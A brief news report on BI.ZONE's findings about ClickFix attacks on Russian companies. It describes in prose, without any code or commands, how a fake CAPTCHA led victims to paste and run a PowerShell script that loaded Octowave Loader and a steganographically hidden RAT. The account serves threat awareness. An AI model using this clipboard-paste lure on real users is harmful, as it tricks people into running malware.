Hackers Exploit Fake CAPTCHA in Targeted Attacks on Russian Companies

In May and early June of 2025, 30 Russian companies became targets of attacks utilizing ClickFix techniques. BI.ZONE Threat Intelligence specialists detected these attacks. Previously, such tactics were only employed against foreign organizations, as reported by the BI.ZONE press service to the Habra information agency.

ClickFix compels users to execute malicious code on their own. In the recent attacks, the perpetrators disguised themselves as law enforcement agencies. They distributed PDF documents with blurred text, requiring users to confirm they weren’t robots to read the content. The “I’m not a robot” button redirected users to the attackers’ site, where another window featuring a fake CAPTCHA appeared.

Upon clicking, a PowerShell script was covertly copied to the user’s clipboard. Users were then instructed to execute specific commands: press Win + R, paste the script using Ctrl + V, and hit Enter, which activated the malicious code.

The script then downloaded a PNG image from the attackers’ server, which contained the Octowave Loader malware. This loader incorporated legitimate files, but some files were hiding harmful elements. One of these concealed its code using steganography, which activated a previously undocumented remote access Trojan (RAT).

The RAT collected fundamental system information and allowed the attackers to run commands on the victim’s device. The PNG files were disguised as political memes, but users were unaware of their content as they were downloaded and opened silently.

BI.ZONE Threat Intelligence experts believe the attacks were aimed at espionage. This is suggested by the use of a custom-built RAT and the disguise of emails as official notifications from authorities.